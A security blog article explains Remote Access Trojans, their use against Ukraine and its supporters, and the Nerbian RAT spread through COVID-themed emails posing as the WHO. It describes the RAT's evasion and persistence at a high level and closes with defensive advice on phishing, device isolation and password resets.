Illness And War: The Spread of the Nerbian RAT

Like the Greek soldiers in their wooden horse at Troy, a Trojan file conceals an attack within its legitimate-seeming exterior. Many Trojan attacks begin with an oblivious victim downloading a file. Once they’ve authorized this download, the device and all its connected hardware become accessible and controllable to the attacker.

However, malware has come a long way from its 1975 roots. Even basic antivirus programs can scan a traditional Trojan and recognize that there are hidden intentions to this sketchy file’s behavior. 

Enter the next-gen Remote Access Trojan: capable of evading researchers, hiding from your antivirus, and even reinstalling itself once deleted. What is a Remote Access Trojan (RAT) - and what can you do against it? 

Trojan Horse VS Modern RAT

A Remote Access Trojan (RAT) is the next evolution of Trojan malware. Thanks to the relative ease of capturing, containing and eradicating traditional Trojans, a successful RAT now focuses on creating a backdoor in an otherwise-secure device. 

The goal of this is to enable administrative control over your computer. RATs are typically downloaded in the traditional Trojan format - packaged together with an apparently legitimate program. Once installed on your device, it will trigger a chain of attacks that seek to deploy the malicious payload, connecting the executable back to the attacker’s command-and-control server.

Once this is established, an attacker can tiptoe around your device, using it to distribute other RATs; establish a botnet; or exfiltrate sensitive data and ransom your organization. 

RAT’s role in Cyber Warfare

Thanks to the relative ease of spreading, and their aptitude for stealth, the RAT has seen significant usage in political and military espionage - particularly from Russia. In 2015, the Ukrainian power grid was brought down for 6 hours, knocking out electricity for over 200,000 citizens. This attack was complex and multifaceted, but one piece of facilitating malware was distributed via a RAT -  spread and propagated via an infected Office document. 

The warfare RAT has resurfaced with the recent Russia-Ukraine conflict, seen in use both within the conflict zone, and targeting Ukraine supporters around the world. WhisperGate - a malicious executable that irrevocably encrypts every file on a device - was spread to humanitarian organizations via site-hosted RATs.

Ukraine supporters have also been targeted with malicious RATs - one example saw that a German site had been set up, promising new information on the conflict. Once a victim clicked through onto the site, Visitors were offered a free infopack, via a file called "2022-Q2-Bedrohungslage-Ukraine". The site claimed that this was constantly updated with new information; users were urged to get a fresh copy every day.

To bypass the Windows Anti-Malware Scan Interface, the payload was decrypted on the fly via a function named “bypass”. The attacker could then remotely deploy a keylogger, fully compromising the device.

The New Nerbian RAT

The Nerbian RAT is a new strain of trojan that utilizes social engineering. In order to entice victims to download this malware, the Nerbian RAT is sent via email, impersonating the World Health Organization. In this email, WHO is apparently sending Covid-19 information to potential targets, packaged as an attached Word document. 

However, this Word document is more than meets the eye. It is laced with malicious macro code. So, if the user opens the attached word file and has content enabled on their Microsoft Office, the RAT now has a foothold on the system. In the background, a batch file quickly performs a PowerShell execution, installing a downloader on the device. 

From here, the RAT can begin logging the key inputs of the user, and monitoring and capturing on-screen information. These work across all OS platforms, and are communicated to the command and control server via SSL; that means all data exchanges are encrypted from network scanning tools.

Sometimes, it’s possible to feel when a device is suffering from a trojan - it may slow down, or you may spot odd programs on your hard drive or task manager. However, the Nerbian RAT evades all of these detection techniques and more. 

A heavy focus is placed on detection evasion and anti-analysis in this RAT’s code. Each segment of the attack chain has been given an unassuming file name, and a rich arsenal of anti-analysis tools prolongs the time in which this novel RAT becomes added to the anti-malware catalog. 

For example, one part of the RAT aims to detect whether it’s a Virtual Machine. VMs are used by cybersecurity researchers to analyze and build defenses against new strains of malware. The Nerbian RAT checks for some common signposts of a VM - whether there’s any program decompilers on the system, or whether the hard disk has “virtual” in its name. If any of these are detected, it does not run.

Furthermore, even if a genuine user finds and deletes the Nerbian keylogger and screen recorder, the downloader is set to maintain malware persistence. Every hour, it checks whether the main payloads are still in place. If not, it simply re-downloads them. 

RAT Extermination

Because RATs are programmed to avoid detection, they can be difficult for the average user to identify. Thanks to this difficulty, it’s very important to block off any attack vectors before a trojan becomes an issue. 

Educate your team on how to identify phishing emails; support their efforts by using an automated phishing prevention software. 

Trojans can quickly snowball into an ever-greater security nightmare. Thanks to its keylogging capabilities, a RAT is particularly efficient at compromising accounts. Here, it becomes especially important that passwords are individual to each account, otherwise the destructive potential of even a single RAT can rapidly spiral. 

It goes without saying that any malware installed on a device should be removed immediately - but this is especially true for RATs. The longer this remains on your device, the more time an attacker has to install malware, exfiltrate confidential data, or collect and compromise more user accounts. 

By isolating the device from its internet connection, it gives time for a comprehensive anti-malware program to fully dig out and extract the malicious files. This is because the third-party command and control server requires an internet connection. A Web Application Firewall can prevent this unauthorized communication in the first place, making it a useful weapon against RATs.

Unfortunately, for most users, it won't be possible to know what data the attacker has accessed. Because of this, always do a complete password wipe after the malware is removed. Change every single password involved in any accounts on that device, and keep a close eye on any other personal accounts going forward.

Post a Comment